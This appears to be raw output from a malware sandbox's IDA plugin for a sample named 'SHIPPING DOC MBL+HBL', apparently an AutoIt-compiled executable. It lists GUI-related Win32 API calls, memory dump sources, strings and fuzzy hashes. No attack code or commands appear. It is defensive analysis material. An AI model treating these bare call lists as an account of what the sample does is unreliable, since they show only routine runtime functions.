                    • GetSysColorBrush.USER32(0000000F), ref: 00E8A94F
                    • GetSysColor.USER32(0000000F), ref: 00E8A95A
                    • CreateSolidBrush.GDI32(?), ref: 00E8A95F
                    • GetSysColor.USER32(00000011), ref: 00E8A977
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A985
                    • SelectObject.GDI32(?,00000000), ref: 00E8A996
                    • SetBkColor.GDI32(?,00000000), ref: 00E8A99F
                    • SelectObject.GDI32(?,?), ref: 00E8A9AC
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A9CB
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9E2
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9F7
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8AA1F
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E8AA46
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00E8AA64
                    • DrawFocusRect.USER32(?,?), ref: 00E8AA6F
                    • GetSysColor.USER32(00000011), ref: 00E8AA7D
                    • SetTextColor.GDI32(?,00000000), ref: 00E8AA85
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E8AA99
                    • SelectObject.GDI32(?,00E8A62C), ref: 00E8AAB0
                    • DeleteObject.GDI32(?), ref: 00E8AABB
                    • SelectObject.GDI32(?,?), ref: 00E8AAC1
                    • DeleteObject.GDI32(?), ref: 00E8AAC6
                    • SetTextColor.GDI32(?,?), ref: 00E8AACC
                    • SetBkColor.GDI32(?,?), ref: 00E8AAD6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: afdf55e521be0e37c6b6bf84fb5b86e91e1c78896f45b1d0d4aa2f0683c4bcab
                    • Instruction ID: a505b655f8c4e4c9cb57c6e4ab0a76cbb8c64000de129016aa2262c37cd11bab
                    • Opcode Fuzzy Hash: afdf55e521be0e37c6b6bf84fb5b86e91e1c78896f45b1d0d4aa2f0683c4bcab
                    • Instruction Fuzzy Hash: 40515D71901208FFDF109FA5DC48EAE7BB9EB48320F254226F919BB2A1D7719940DF90
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E88AF3
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88B04
                    • CharNextW.USER32(0000014E), ref: 00E88B33
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E88B74
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E88B8A
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88B9B
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E88BB8
                    • SetWindowTextW.USER32(?,0000014E), ref: 00E88C0A
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E88C20
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E88C51
                    • _memset.LIBCMT ref: 00E88C76
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E88CBF
                    • _memset.LIBCMT ref: 00E88D1E
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E88D48
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E88DA0
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00E88E4D
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00E88E6F
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88EB9
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88EE6
                    • DrawMenuBar.USER32(?), ref: 00E88EF5
                    • SetWindowTextW.USER32(?,0000014E), ref: 00E88F1D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 2dcd33b51250075a831625fdf6532b2089250e812a587fbd0ecfb3035746664d
                    • Instruction ID: d8d1a4db96d794c7b95750518ba19e3da3348da91b71c5be2be560bf94ddc149
                    • Opcode Fuzzy Hash: 2dcd33b51250075a831625fdf6532b2089250e812a587fbd0ecfb3035746664d
                    • Instruction Fuzzy Hash: 90E19F71900208AFDB20AF51CD84EEE7BB9EF04754F50915AFE1DBA2A0DB709985DF60
                    APIs
                    • GetCursorPos.USER32(?), ref: 00E84A33
                    • GetDesktopWindow.USER32 ref: 00E84A48
                    • GetWindowRect.USER32(00000000), ref: 00E84A4F
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E84AB1
                    • DestroyWindow.USER32(?), ref: 00E84ADD
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E84B06
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E84B24
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E84B4A
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00E84B5F
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E84B72
                    • IsWindowVisible.USER32(?), ref: 00E84B92
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E84BAD
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E84BC1
                    • GetWindowRect.USER32(?,?), ref: 00E84BD9
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00E84BFF
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00E84C19
                    • CopyRect.USER32(?,?), ref: 00E84C30
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00E84C9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 0f9066d6fc39eb1ccb990dbf6cffe973e00c98db040e32a0557292a2fd7e1fae
                    • Instruction ID: a5961c3496aca342b1333ecb21f2b3cde5789ebcf170619ca595eb558c27f6f7
                    • Opcode Fuzzy Hash: 0f9066d6fc39eb1ccb990dbf6cffe973e00c98db040e32a0557292a2fd7e1fae
                    • Instruction Fuzzy Hash: 83B16CB1604342AFDB04EF65C888B6ABBE4FF84314F00991DF59DAB292D771D844CB95
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028BC
                    • GetSystemMetrics.USER32(00000007), ref: 00E028C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028EF
                    • GetSystemMetrics.USER32(00000008), ref: 00E028F7
                    • GetSystemMetrics.USER32(00000004), ref: 00E0291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E02939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E02949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E0297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E02990
                    • GetClientRect.USER32(00000000,000000FF), ref: 00E029AE
                    • GetStockObject.GDI32(00000011), ref: 00E029CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E029D5
                      • Part of subcall function 00E02344: GetCursorPos.USER32(?), ref: 00E02357
                      • Part of subcall function 00E02344: ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
                      • Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000001), ref: 00E02399
                      • Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000002), ref: 00E023A7
                    • SetTimer.USER32(00000000,00000000,00000028,00E01256), ref: 00E029FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 30ab825195b3b497055b80915583be952df096e165a7406f8753c088cd9e7611
                    • Instruction ID: 85105967ec72dcaeed0ffece7ca6d1b209bfe8c88e9f1673eb174fb2cf0caa23
                    • Opcode Fuzzy Hash: 30ab825195b3b497055b80915583be952df096e165a7406f8753c088cd9e7611
                    • Instruction Fuzzy Hash: 9BB17F71A0020ADFDB14DFA9DC49BAE7BB4FB48314F105129FA15B62E0DB70E895CB50
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 00E5A885
                    • __swprintf.LIBCMT ref: 00E5A926
                    • _wcscmp.LIBCMT ref: 00E5A939
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E5A98E
                    • _wcscmp.LIBCMT ref: 00E5A9CA
                    • GetClassNameW.USER32(?,?,00000400), ref: 00E5AA01
                    • GetDlgCtrlID.USER32(?), ref: 00E5AA53
                    • GetWindowRect.USER32(?,?), ref: 00E5AA89
                    • GetParent.USER32(?), ref: 00E5AAA7
                    • ScreenToClient.USER32(00000000), ref: 00E5AAAE
                    • GetClassNameW.USER32(?,?,00000100), ref: 00E5AB28
                    • _wcscmp.LIBCMT ref: 00E5AB3C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 00E5AB62
                    • _wcscmp.LIBCMT ref: 00E5AB76
                      • Part of subcall function 00E237AC: _iswctype.LIBCMT ref: 00E237B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 46d3cddd9af875ccc777a22fbce9475fede24861a258d34d6796014891e4deaf
                    • Instruction ID: ddebd14715351abaa8d073f8ac9f315f1af32f76c5082a34297be8be3345146f
                    • Opcode Fuzzy Hash: 46d3cddd9af875ccc777a22fbce9475fede24861a258d34d6796014891e4deaf
                    • Instruction Fuzzy Hash: 88A1C171204206AFD718DF20C884BAAB7E9FF4431AF185B29FD99E2151D730E949CBD2
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00E5B1DA
                    • _wcscmp.LIBCMT ref: 00E5B1EB
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E5B213
                    • CharUpperBuffW.USER32(?,00000000), ref: 00E5B230
                    • _wcscmp.LIBCMT ref: 00E5B24E
                    • _wcsstr.LIBCMT ref: 00E5B25F
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5B297
                    • _wcscmp.LIBCMT ref: 00E5B2A7
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E5B2CE
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5B317
                    • _wcscmp.LIBCMT ref: 00E5B327
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00E5B34F
                    • GetWindowRect.USER32(00000004,?), ref: 00E5B3B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 014c9b79b1bb690b616580c57c0c10daedbccdce4d0fe307a50265cd5c944d8e
                    • Instruction ID: eb09826fd2a5af2df6e69795b7e37dca1a8e09c95476ad96e07d94456fce640b
                    • Opcode Fuzzy Hash: 014c9b79b1bb690b616580c57c0c10daedbccdce4d0fe307a50265cd5c944d8e
                    • Instruction Fuzzy Hash: BF81B4710043059FDB10DF14C885FAA77E8EF44319F14A96AFD89BA0A2EB74DD49CB61
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • DragQueryPoint.SHELL32(?,?), ref: 00E8C691
                      • Part of subcall function 00E8AB69: ClientToScreen.USER32(?,?), ref: 00E8AB92
                      • Part of subcall function 00E8AB69: GetWindowRect.USER32(?,?), ref: 00E8AC08
                      • Part of subcall function 00E8AB69: PtInRect.USER32(?,?,00E8C07E), ref: 00E8AC18
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C6FA
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E8C705
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E8C728
                    • _wcscat.LIBCMT ref: 00E8C758
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E8C76F
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C788
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C79F
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C7C1
                    • DragFinish.SHELL32(?), ref: 00E8C7C8
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E8C8BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
                    • API String ID: 169749273-730855631
                    • Opcode ID: ac17db1c39f92220f7ca7ab3f7888289647086d50cfd175c9eef68c8ac35a226
                    • Instruction ID: 0590a05f620c65c787d9a12e93a7a5ee1bd6b4a4382c0d05a599106db22ef380
                    • Opcode Fuzzy Hash: ac17db1c39f92220f7ca7ab3f7888289647086d50cfd175c9eef68c8ac35a226
                    • Instruction Fuzzy Hash: 5D617072108301AFC700EF60DC85D9BBBF8EF89710F10192EF599A61A1DB31A989CB52
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: c53ef670271d78f452e040f7d2c53203d3c5a8a320c93b164f4e9b37d45b77e6
                    • Instruction ID: 51217c8e6a43a27fd6f4899b553c1aad498ede8c2f37f9f6f07dd1a03501d54d
                    • Opcode Fuzzy Hash: c53ef670271d78f452e040f7d2c53203d3c5a8a320c93b164f4e9b37d45b77e6
                    • Instruction Fuzzy Hash: CC319231A48309E6DB24FA60DD53EEF77E49F24711F202829F895714D2EF616F48CA51
                    APIs
                    • LoadIconW.USER32(00000063), ref: 00E5C2D3
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E5C2E5
                    • SetWindowTextW.USER32(?,?), ref: 00E5C2FC
                    • GetDlgItem.USER32(?,000003EA), ref: 00E5C311
                    • SetWindowTextW.USER32(00000000,?), ref: 00E5C317
                    • GetDlgItem.USER32(?,000003E9), ref: 00E5C327
                    • SetWindowTextW.USER32(00000000,?), ref: 00E5C32D
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E5C34E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E5C368
                    • GetWindowRect.USER32(?,?), ref: 00E5C371
                    • SetWindowTextW.USER32(?,?), ref: 00E5C3DC
                    • GetDesktopWindow.USER32 ref: 00E5C3E2
                    • GetWindowRect.USER32(00000000), ref: 00E5C3E9
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E5C435
                    • GetClientRect.USER32(?,?), ref: 00E5C442
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E5C467
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E5C492
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: e9ffaf5d82a279e7ebe20f7d6b3d0047fa6e84c31af063f2f971216885973b08
                    • Instruction ID: 11c023932d5cd7d8fe19aeb3e09d4a630ae75786f86db480d27d68f70cf9dc7d
                    • Opcode Fuzzy Hash: e9ffaf5d82a279e7ebe20f7d6b3d0047fa6e84c31af063f2f971216885973b08
                    • Instruction Fuzzy Hash: FE519F30900709EFDB20DFA9DD85B6EBBF5FF04709F104A28EA46B25A0D770A958DB50
                    APIs
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00E75129
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E75134
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00E7513F
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00E7514A
                    • LoadCursorW.USER32(00000000,00007F01), ref: 00E75155
                    • LoadCursorW.USER32(00000000,00007F81), ref: 00E75160
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00E7516B
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00E75176
                    • LoadCursorW.USER32(00000000,00007F86), ref: 00E75181
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00E7518C
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00E75197
                    • LoadCursorW.USER32(00000000,00007F82), ref: 00E751A2
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00E751AD
                    • LoadCursorW.USER32(00000000,00007F04), ref: 00E751B8
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00E751C3
                    • LoadCursorW.USER32(00000000,00007F89), ref: 00E751CE
                    • GetCursorInfo.USER32(?), ref: 00E751DE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Cursor$Load$Info
                    • String ID:
                    • API String ID: 2577412497-0
                    • Opcode ID: 1c488541b5a545db8e16fdd4a35b6bc473506704bf17832ab9b0d52a558f6ae6
                    • Instruction ID: e60c2686e01de238d8ca0f7b0be488080e4350292da6f6d9e4871f4b71725320
                    • Opcode Fuzzy Hash: 1c488541b5a545db8e16fdd4a35b6bc473506704bf17832ab9b0d52a558f6ae6
                    • Instruction Fuzzy Hash: 253117B1D4831D6ADB109FB69C8995FBEF8FF04750F50452AE50DF7281DA7865008F91
                    APIs
                    • _memset.LIBCMT ref: 00E8A28B
                    • DestroyWindow.USER32(?,?), ref: 00E8A305
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E8A37F
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E8A3A1
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A3B4
                    • DestroyWindow.USER32(00000000), ref: 00E8A3D6
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E00000,00000000), ref: 00E8A40D
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A426
                    • GetDesktopWindow.USER32 ref: 00E8A43F
                    • GetWindowRect.USER32(00000000), ref: 00E8A446
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E8A45E
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E8A476
                      • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: 3825d3633978b697ff376fb40a936c147d709e5eb6eb46a7817f232ee8421452
                    • Instruction ID: 1c000f99aa62a77169b78b1ce5ca33b9168f0ed9e4885f8eec4d10e1c6daaaac
                    • Opcode Fuzzy Hash: 3825d3633978b697ff376fb40a936c147d709e5eb6eb46a7817f232ee8421452
                    • Instruction Fuzzy Hash: 3971BF71150244AFEB24DF28CC49F6A77E5FB88704F08052DF999A72A0DB71E946CF52
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E8B8E8
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00E86B43,?), ref: 00E8B944
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B97D
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E8B9C0
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B9F7
                    • FreeLibrary.KERNEL32(?), ref: 00E8BA03
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E8BA13
                    • DestroyIcon.USER32(?), ref: 00E8BA22
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E8BA3F
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E8BA4B
                      • Part of subcall function 00E2307D: __wcsicmp_l.LIBCMT ref: 00E23106
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
